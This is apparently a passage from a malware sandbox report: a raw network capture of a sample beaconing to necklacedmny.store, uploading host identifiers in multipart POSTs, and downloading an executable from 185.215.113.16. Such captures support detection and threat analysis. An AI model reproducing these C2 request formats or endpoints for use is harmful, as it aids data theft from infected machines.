                                                                            Oct 31, 2024 20:49:11.989175081 CET1236INData Raw: 16 b6 b8 17 4e 15 ba 50 b7 6a b8 e8 c7 30 df 26 13 d9 d1 36 54 7f e4 76 83 a0 87 69 fd df 76 43 6f 32 0c b2 f8 3d 31 f6 1f e5 ff 20 e8 7b 4a 56 a4 a3 9b 26 60 ac 44 6d b6 7d b9 6c a6 ab 00 44 a8 b4 ab 16 4e a9 af 0e 52 50 9b 60 c4 5a b9 c7 70 8d
                                                                            Data Ascii: NPj0&6TvivCo2=1 {JV&`Dm}lDNRP`Zp3(\C^VE3NMFWYARGP~kzVgkGK]Q>vdn]l(D<ZtX(CZY6E[HTLV-.v< 3E%}y
                                                                            Oct 31, 2024 20:49:11.989185095 CET1236INData Raw: 22 b1 a1 00 0a b1 9d 34 13 8a 18 20 cd 52 a6 b9 74 4a aa 2c 46 7f 84 49 84 29 fc 10 aa 72 ac 17 74 4a ec 36 16 12 e8 15 1b bf 2f a8 aa b1 e1 16 74 16 a0 f8 46 6e d0 22 58 d5 ca ec 72 52 c4 41 44 4d 0c cc cd 36 b7 9e aa 32 94 17 34 5d 2c d8 3c fa
                                                                            Data Ascii: "4 RtJ,FI)rtJ6/tFn"XrRADM624],<$$OZ<Al8)tJh6ddcLIl<\i6T9^LF9VZ%KJO,:g?'dG*AgRchk6>S2}=rA'aJ~RG7W|B6W6^
                                                                            Oct 31, 2024 20:49:11.989196062 CET1236INData Raw: 6b 54 ab 11 40 7a a0 45 67 09 70 16 bf 8e b1 a3 b9 bf a3 f8 7a a1 fd 71 cf 18 f1 09 59 9a cf 72 51 49 f6 e7 b8 35 82 53 25 1b 4f 45 94 5c ef 81 64 b2 cd 06 ca 0f 33 f4 a4 82 c7 f4 55 1f d0 cd 3c a1 d5 39 a6 1b dc 1f bb e4 0c 17 32 c1 8b c4 f7 88
                                                                            Data Ascii: kT@zEgpzqYrQI5S%OE\d3U<92VFbTwKUs*Zfs_0qY?9LLlDOT+#<K2sZkm$$Y.:G`K`';VyUIx)2g!Gs"$*U;'YFa
                                                                            Oct 31, 2024 20:49:11.994329929 CET1120INData Raw: b3 69 5b 7c 9d 5e 41 4f 98 da bf 53 d1 be 83 37 c8 a1 b7 d7 c8 5e e0 58 c5 44 54 f0 cb a9 5a 27 c8 ae df 1a 75 5d 12 85 47 95 45 e1 69 ef a7 b9 73 f0 c8 13 6b 0c 98 68 74 bc b3 03 52 1d d4 1a c2 13 da 15 58 1f e3 79 f5 51 b5 87 04 0b d1 d5 54 9a
                                                                            Data Ascii: i[|^AOS7^XDTZ'u]GEiskhtRXyQT2F%/H`0H)&PR"?=|!/~ J9K'yHB8RF9uNW/m_7`7nkOJMF!N)l}V!7uhu6n_^VSdL(4
                                                                            Oct 31, 2024 20:49:42.643208981 CET204OUTGET /mine/random.exe HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Host: 185.215.113.16
                                                                            Oct 31, 2024 20:49:42.932173967 CET1236INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Thu, 31 Oct 2024 19:49:42 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 1886208
                                                                            Last-Modified: Thu, 31 Oct 2024 19:30:05 GMT
                                                                            Connection: keep-alive
                                                                            ETag: "6723dabd-1cc800"
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 e0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVfJ@K2@WkDJtJ @.rsrcD@.idata @ p*@whlejstb 1@gsptuyynJ@.taggant0J"@


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.649709188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:48:58 UTC265OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:48:58 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2024-10-31 19:48:59 UTC1013INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:48:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=0hmerv89pgjkr3h4tsafl0n6b2; expires=Mon, 24-Feb-2025 13:35:37 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mqxPs%2BXp5jjBuWm3CHRkdm4XFEFWegptEuFevEmtnSt3yWT7yRH%2BSWLD39ytX22TIupdEfFz2BEIjzCENCbXKNFnoIpysRI5m45pAeS%2B83hEznDiA27gKTRNczpIyish2QDkB7M%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a6b3951eabd-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=2389438&cwnd=250&unsent_bytes=0&cid=a8a26f68677e63fd&ts=709&x=0"
                                                                            2024-10-31 19:48:59 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2024-10-31 19:48:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.649710188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:48:59 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 52
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:48:59 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                            2024-10-31 19:49:00 UTC1019INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:00 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6kebov7prbbnqp8p3eckr7m5da; expires=Mon, 24-Feb-2025 13:35:39 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=whUWwgYeDceVfX2YrhCFP9vL%2BZmrAQmHFUxvm75H3LRIvHVGRgI4PxQi3NqidWFHe%2B1M4d7l5JwaqN%2FM8BTZtxnUbrgTWMU6pRyH75t1cXnK9lBklH8%2B%2FL%2FRmjlOgTdXDfhE75I%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a723a2bddac-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1109&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2599640&cwnd=252&unsent_bytes=0&cid=a32f9a659aac4909&ts=499&x=0"
                                                                            2024-10-31 19:49:00 UTC350INData Raw: 34 34 36 63 0d 0a 71 57 7a 6d 50 63 63 42 4e 6b 44 30 4c 4f 33 47 6b 73 4f 2f 5a 77 57 77 2b 63 49 34 72 70 4f 66 48 49 57 31 34 73 46 30 79 68 76 53 54 70 41 66 2f 54 55 61 59 6f 64 4a 7a 2f 7a 6d 73 63 6f 43 4b 5a 4b 59 70 68 71 55 39 66 35 77 39 74 44 4f 34 77 4b 6e 4f 5a 4d 4b 68 31 47 30 5a 42 70 69 6b 56 54 50 2f 4d 6d 34 6e 51 4a 72 6b 73 50 67 58 63 54 78 2f 6e 44 6e 31 49 6d 75 42 4b 5a 34 77 51 43 42 56 61 4a 69 55 69 47 59 51 59 69 6a 39 36 4c 56 43 57 7a 64 6b 61 38 61 67 72 48 36 5a 71 65 50 77 49 77 52 76 6e 72 6b 44 5a 56 57 35 58 77 61 4f 39 5a 4a 67 2b 53 6f 34 64 34 43 5a 39 79 66 70 6c 50 47 2b 2f 64 34 35 74 47 49 73 52 32 73 63 38 45 4f 67 6c 53 6f 61 30 59 73 6b 6b 61 44 70 66 32 69 6e 55 73 6e 31 59 50 67 41 6f 79 69 7a 33 33 32 78
                                                                            Data Ascii: 446cqWzmPccBNkD0LO3GksO/ZwWw+cI4rpOfHIW14sF0yhvSTpAf/TUaYodJz/zmscoCKZKYphqU9f5w9tDO4wKnOZMKh1G0ZBpikVTP/Mm4nQJrksPgXcTx/nDn1ImuBKZ4wQCBVaJiUiGYQYij96LVCWzdka8agrH6ZqePwIwRvnrkDZVW5XwaO9ZJg+So4d4CZ9yfplPG+/d45tGIsR2sc8EOglSoa0YskkaDpf2inUsn1YPgAoyiz332x
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 67 6c 47 6b 62 6c 51 77 6e 6b 57 45 6f 65 4b 71 31 41 68 71 30 70 61 71 56 63 2f 78 2b 6e 54 74 32 49 71 6e 47 36 56 2f 79 77 37 45 45 65 56 6b 54 47 4c 4f 44 71 79 68 34 4b 62 52 45 79 58 6f 32 37 38 55 31 62 48 36 63 71 65 50 77 4b 73 54 71 33 72 41 41 59 64 58 72 6e 46 55 4d 4a 42 44 69 72 62 32 70 4e 4d 50 5a 4d 43 52 72 6c 7a 50 2b 50 5a 33 34 74 43 45 34 31 6a 6f 66 74 4e 4f 33 42 2b 45 62 6c 38 75 6e 46 6d 50 35 4f 2f 76 78 45 56 67 33 74 76 34 47 73 6a 77 2b 58 2f 6a 32 59 36 6e 47 71 35 33 78 67 47 43 56 61 56 6b 58 69 71 65 54 34 4b 76 2f 36 48 59 43 47 50 55 6c 36 46 66 6a 4c 2b 39 65 66 2b 58 32 4f 4d 34 72 33 72 5a 54 4c 46 63 71 32 31 54 4e 4e 5a 52 77 62 32 77 70 74 46 46 50 35 4b 56 70 56 58 65 38 4f 39 37 36 63 57 4d 70 68 43 6c 65 73 55
                                                                            Data Ascii: glGkblQwnkWEoeKq1Ahq0paqVc/x+nTt2IqnG6V/yw7EEeVkTGLODqyh4KbREyXo278U1bH6cqePwKsTq3rAAYdXrnFUMJBDirb2pNMPZMCRrlzP+PZ34tCE41joftNO3B+Ebl8unFmP5O/vxEVg3tv4Gsjw+X/j2Y6nGq53xgGCVaVkXiqeT4Kv/6HYCGPUl6FfjL+9ef+X2OM4r3rZTLFcq21TNNZRwb2wptFFP5KVpVXe8O976cWMphClesU
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 32 31 54 4e 4e 5a 52 77 62 32 77 70 74 46 46 50 35 4b 58 71 56 72 48 2b 2f 6c 2b 34 4e 71 46 6f 42 47 72 64 4d 77 45 69 6c 69 68 62 31 30 76 6b 45 36 49 6f 50 57 7a 32 41 78 72 33 74 76 75 47 73 76 70 76 53 61 6e 2b 49 65 31 46 59 64 36 32 67 66 45 51 4f 74 36 46 43 57 61 44 74 66 6b 39 36 54 56 44 6d 48 61 6d 37 4a 66 77 76 72 38 64 4f 48 57 6a 61 38 51 71 48 6a 4c 43 49 68 66 6f 6d 52 47 4d 4a 4e 49 6e 61 36 77 37 35 30 43 66 35 4c 44 34 47 7a 63 35 75 78 6f 70 65 4b 44 72 52 69 76 62 34 73 52 79 6b 62 6c 5a 46 68 69 7a 67 36 45 70 50 79 6d 31 51 4e 6a 32 70 53 76 55 39 37 77 38 58 44 31 30 49 43 71 47 4b 64 31 77 67 4f 44 55 71 35 70 57 53 61 52 54 38 2f 71 73 4b 62 46 52 54 2b 53 72 62 42 58 77 4e 2f 32 63 75 36 58 6e 2b 30 50 36 48 37 48 54 74 77 66
                                                                            Data Ascii: 21TNNZRwb2wptFFP5KXqVrH+/l+4NqFoBGrdMwEilihb10vkE6IoPWz2Axr3tvuGsvpvSan+Ie1FYd62gfEQOt6FCWaDtfk96TVDmHam7Jfwvr8dOHWja8QqHjLCIhfomRGMJNIna6w750Cf5LD4Gzc5uxopeKDrRivb4sRykblZFhizg6EpPym1QNj2pSvU97w8XD10ICqGKd1wgODUq5pWSaRT8/qsKbFRT+SrbBXwN/2cu6Xn+0P6H7HTtwf
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 32 58 53 6f 71 68 39 4b 62 5a 41 32 69 53 31 65 42 64 31 4c 47 6c 50 73 6a 77 74 65 45 33 6b 6a 6e 55 51 4a 30 66 6f 6d 38 55 65 74 5a 43 6a 4b 6a 34 72 74 73 4d 61 39 69 53 71 31 62 48 39 66 46 33 34 74 47 42 70 68 4f 70 66 63 63 45 67 6c 79 6d 62 46 73 74 6e 67 37 42 35 50 65 35 6e 56 30 6e 39 34 79 72 56 4d 71 78 34 6a 44 2b 6c 34 65 76 56 76 41 35 78 77 65 43 57 61 42 76 56 53 53 65 53 34 65 67 38 61 66 62 42 6d 6a 57 6e 71 46 56 79 50 33 7a 64 4f 62 57 6a 4b 67 5a 6f 33 79 4c 51 4d 52 59 76 53 4d 4d 59 71 64 4e 6d 62 50 67 72 5a 30 61 4b 63 76 62 70 31 61 4d 71 62 31 2f 39 64 32 4b 72 52 4f 6e 66 4d 67 42 67 31 4b 6a 62 31 34 72 6e 6b 69 41 72 65 4b 69 30 51 74 67 33 4a 65 75 56 38 62 79 38 44 36 70 6c 34 65 37 56 76 41 35 35 77 6d 4a 63 61 35 76 55
                                                                            Data Ascii: 2XSoqh9KbZA2iS1eBd1LGlPsjwteE3kjnUQJ0fom8UetZCjKj4rtsMa9iSq1bH9fF34tGBphOpfccEglymbFstng7B5Pe5nV0n94yrVMqx4jD+l4evVvA5xweCWaBvVSSeS4eg8afbBmjWnqFVyP3zdObWjKgZo3yLQMRYvSMMYqdNmbPgrZ0aKcvbp1aMqb1/9d2KrROnfMgBg1Kjb14rnkiAreKi0Qtg3JeuV8by8D6pl4e7VvA55wmJca5vU
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 64 35 4c 37 68 32 68 30 6e 69 74 75 57 58 64 7a 68 2f 6a 7a 57 77 59 4f 31 48 61 56 31 69 78 48 4b 52 75 56 6b 57 47 4c 4f 44 6f 6d 72 2b 61 4c 53 42 47 37 65 6c 71 56 54 79 66 44 37 65 75 33 64 67 4b 55 51 71 58 7a 42 44 59 56 56 72 47 52 63 4a 5a 56 63 7a 2b 71 77 70 73 56 46 50 35 4b 79 70 30 6a 43 34 62 31 68 71 63 37 41 70 42 72 6f 49 59 73 4b 6a 6c 43 68 5a 46 67 6b 6b 30 69 43 70 66 2b 67 33 51 70 6a 32 5a 4b 6d 57 38 48 30 38 48 72 31 33 59 75 73 47 71 46 31 78 6b 37 4b 48 36 4a 37 46 48 72 57 66 34 4b 71 2f 71 62 4c 52 58 69 63 67 75 42 64 77 4c 47 6c 50 75 62 62 6a 36 41 5a 71 33 72 4b 42 4a 5a 4e 71 57 70 63 4a 35 70 46 67 61 4c 69 70 39 49 4d 5a 4e 47 53 70 31 4c 41 2b 2f 35 35 70 35 6e 41 70 41 37 6f 49 59 73 74 6b 30 2b 6f 49 30 74 73 6a 77
                                                                            Data Ascii: d5L7h2h0nituWXdzh/jzWwYO1HaV1ixHKRuVkWGLODomr+aLSBG7elqVTyfD7eu3dgKUQqXzBDYVVrGRcJZVcz+qwpsVFP5Kyp0jC4b1hqc7ApBroIYsKjlChZFgkk0iCpf+g3Qpj2ZKmW8H08Hr13YusGqF1xk7KH6J7FHrWf4Kq/qbLRXicguBdwLGlPubbj6AZq3rKBJZNqWpcJ5pFgaLip9IMZNGSp1LA+/55p5nApA7oIYstk0+oI0tsjw
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 70 74 73 4c 64 64 65 64 72 31 58 46 2b 50 6c 32 35 4e 65 45 70 78 47 74 65 73 63 46 67 31 79 71 5a 31 30 73 6e 30 48 50 36 72 43 6d 78 55 55 2f 6b 72 71 37 57 63 44 38 76 57 47 70 7a 73 43 6b 47 75 67 68 69 77 4b 4b 57 71 56 70 55 69 61 54 53 49 57 68 38 4b 72 65 43 6d 50 55 6e 36 39 61 78 2f 6a 38 65 4f 4c 64 69 36 55 62 71 33 2f 4e 54 73 6f 66 6f 6e 73 55 65 74 5a 75 6c 4b 6e 38 70 70 30 61 4b 63 76 62 70 31 61 4d 71 62 31 31 36 39 4f 48 6f 78 75 72 63 63 34 4b 6a 6c 71 6c 61 30 59 71 6c 6b 6d 64 74 76 43 6f 32 41 6c 6b 30 70 2b 6d 55 38 72 79 2b 54 36 70 6c 34 65 37 56 76 41 35 35 67 4b 44 64 71 4a 34 46 44 33 59 56 38 2b 6a 2f 4f 47 46 52 57 62 5a 6b 61 39 58 7a 2f 66 2b 64 65 4c 64 67 61 51 65 70 57 76 49 41 59 74 62 70 57 78 53 4a 4a 64 42 69 61 50
                                                                            Data Ascii: ptsLddedr1XF+Pl25NeEpxGtescFg1yqZ10sn0HP6rCmxUU/krq7WcD8vWGpzsCkGughiwKKWqVpUiaTSIWh8KreCmPUn69ax/j8eOLdi6Ubq3/NTsofonsUetZulKn8pp0aKcvbp1aMqb1169OHoxurcc4Kjlqla0YqlkmdtvCo2Alk0p+mU8ry+T6pl4e7VvA55gKDdqJ4FD3YV8+j/OGFRWbZka9Xz/f+deLdgaQepWvIAYtbpWxSJJdBiaP
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 32 53 56 70 5a 35 39 32 76 76 36 62 75 44 41 6a 2b 4e 59 36 48 61 4c 56 72 30 66 72 47 52 50 4d 34 42 44 6e 36 4f 77 6e 70 4e 46 66 35 4c 44 34 47 2f 50 2f 2f 4e 35 38 63 62 4e 68 41 43 69 66 74 73 4a 6b 31 44 6c 4c 52 51 6b 31 68 62 63 36 72 43 6c 7a 45 55 2f 67 73 6e 37 44 35 2b 6d 72 53 7a 34 6d 5a 6e 6a 41 4f 67 68 6d 55 44 45 54 65 55 37 46 47 57 56 58 4a 32 69 38 37 66 65 51 6c 6e 73 76 4c 70 58 79 75 62 73 51 4e 6e 51 6d 71 34 51 76 32 69 48 47 34 64 52 71 32 52 43 59 74 67 4f 67 4f 53 6f 6d 4a 31 4e 4a 2b 33 56 34 45 4b 4d 71 62 31 4c 35 4e 6d 4f 70 41 43 35 4e 4f 77 55 69 56 6d 79 63 68 52 73 31 6b 6a 50 2f 4b 44 76 6e 51 46 32 6b 73 50 77 43 4a 65 6b 72 69 6d 33 68 5a 2f 74 44 2b 68 76 69 31 62 57 45 65 56 78 46 48 72 57 43 59 79 32 34 71 66 65
                                                                            Data Ascii: 2SVpZ592vv6buDAj+NY6HaLVr0frGRPM4BDn6OwnpNFf5LD4G/P//N58cbNhACiftsJk1DlLRQk1hbc6rClzEU/gsn7D5+mrSz4mZnjAOghmUDETeU7FGWVXJ2i87feQlnsvLpXyubsQNnQmq4Qv2iHG4dRq2RCYtgOgOSomJ1NJ+3V4EKMqb1L5NmOpAC5NOwUiVmychRs1kjP/KDvnQF2ksPwCJekrim3hZ/tD+hvi1bWEeVxFHrWCYy24qfe
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 75 34 47 70 53 78 79 48 33 70 32 59 65 31 42 2b 56 65 78 51 6d 46 53 62 56 30 57 32 4c 59 44 6f 6e 6b 71 50 4f 54 52 57 50 44 32 2f 67 4b 6e 71 71 6f 4c 62 43 48 30 72 78 59 73 54 6e 64 54 74 77 4e 36 79 4e 47 59 73 34 4f 79 4b 66 69 73 39 73 47 63 64 48 63 6e 6d 54 72 2f 2f 70 2f 38 63 65 58 72 46 6d 47 54 2b 6f 77 75 6b 71 6d 62 56 6f 6c 67 46 2f 50 36 72 43 75 6e 56 31 65 6b 74 50 67 5a 59 4b 78 35 54 36 2f 6c 37 57 67 47 4b 5a 2b 33 52 2f 4a 65 4b 74 6b 56 54 53 47 57 59 44 72 33 70 66 38 52 53 6d 53 6e 65 41 43 6e 72 2b 39 65 76 61 58 32 50 4e 45 38 79 79 59 57 64 51 4e 75 69 31 4e 59 6f 41 4f 31 2f 61 2b 34 63 39 46 50 35 4c 63 6f 30 6a 65 39 2f 35 6f 35 4a 43 2b 6e 54 47 6d 66 73 6f 59 6c 46 4b 70 51 6c 63 7a 6e 48 43 78 73 66 4f 76 30 77 4a 78 77
                                                                            Data Ascii: u4GpSxyH3p2Ye1B+VexQmFSbV0W2LYDonkqPOTRWPD2/gKnqqoLbCH0rxYsTndTtwN6yNGYs4OyKfis9sGcdHcnmTr//p/8ceXrFmGT+owukqmbVolgF/P6rCunV1ektPgZYKx5T6/l7WgGKZ+3R/JeKtkVTSGWYDr3pf8RSmSneACnr+9evaX2PNE8yyYWdQNui1NYoAO1/a+4c9FP5Lco0je9/5o5JC+nTGmfsoYlFKpQlcznHCxsfOv0wJxw
                                                                            2024-10-31 19:49:00 UTC1369INData Raw: 4f 77 50 42 36 38 63 4b 44 73 78 47 57 52 2b 59 63 67 30 2b 6d 49 58 67 6c 6d 30 4b 78 6d 73 65 77 32 68 55 6c 39 4a 69 32 57 59 79 2f 76 57 61 6e 6a 38 43 4f 42 4b 39 70 79 45 79 6f 57 4b 68 76 46 44 33 59 56 38 2b 79 73 50 6d 4f 53 79 66 41 32 2f 67 61 69 2f 4c 76 62 4f 48 55 6c 71 42 52 6c 6b 66 6d 48 49 4e 50 70 69 46 6c 4c 35 4a 59 6d 71 66 67 70 75 4d 37 53 73 43 63 73 46 6d 4f 31 4d 63 38 31 73 47 44 6f 78 69 76 4f 59 56 4f 6e 42 2f 39 49 33 6b 77 6b 56 36 4d 35 74 57 62 6e 7a 52 78 30 5a 75 75 58 59 7a 75 73 32 65 6e 77 63 44 37 52 65 59 35 32 55 37 63 48 2b 4a 74 57 53 4f 56 51 49 79 32 34 71 66 65 45 32 53 56 70 5a 35 31 78 2f 44 74 63 2f 62 61 68 4c 55 6f 6c 6c 37 4e 43 34 4e 68 6d 31 52 46 4a 59 59 4d 71 61 66 6d 6f 70 31 4c 4a 38 72 62 2b 42
                                                                            Data Ascii: OwPB68cKDsxGWR+Ycg0+mIXglm0Kxmsew2hUl9Ji2WYy/vWanj8COBK9pyEyoWKhvFD3YV8+ysPmOSyfA2/gai/LvbOHUlqBRlkfmHINPpiFlL5JYmqfgpuM7SsCcsFmO1Mc81sGDoxivOYVOnB/9I3kwkV6M5tWbnzRx0ZuuXYzus2enwcD7ReY52U7cH+JtWSOVQIy24qfeE2SVpZ51x/Dtc/bahLUoll7NC4Nhm1RFJYYMqafmop1LJ8rb+B


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.649712188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-31 19:49:01 UTC284OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 12864
                                                                            Host: necklacedmny.store
                                                                            2024-10-31 19:49:01 UTC12864OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 44 38 37 32 36 36 32 36 34 39 41 44 34 31 32 39 45 32 39 34 39 38 33 30 37 34 44 37 30 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2D872662649AD4129E294983074D70B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                            2024-10-31 19:49:01 UTC1020INHTTP/1.1 200 OK
                                                                            Date: Thu, 31 Oct 2024 19:49:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=nrefp2eckk1bllqh1jmthsqdbb; expires=Mon, 24-Feb-2025 13:35:40 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z31kesilZHMX4lP7lsUvZRbQfScR0TGBABIIEgLQ%2FD7U7DiJcNMlsfeco6Ll5bqw%2BRRnsA%2B4JlndCxanOcdNsPuRMdcy%2Fpx2sYRUJq1WhBAbM1Mwh9dmygQxEfk%2FJ8B5ysmbck0%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8db62a7ad856283f-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1211&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13806&delivery_rate=2560565&cwnd=251&unsent_bytes=0&cid=c3f7df9d84cda1dd&ts=406&x=0"
                                                                            2024-10-31 19:49:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                            Data Ascii: 11ok 173.254.250.77
                                                                            2024-10-31 19:49:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.649713188.114.97.34432136C:\Users\user\Desktop\file.exe
                                                                            TimestampBytes transferredDirectionData
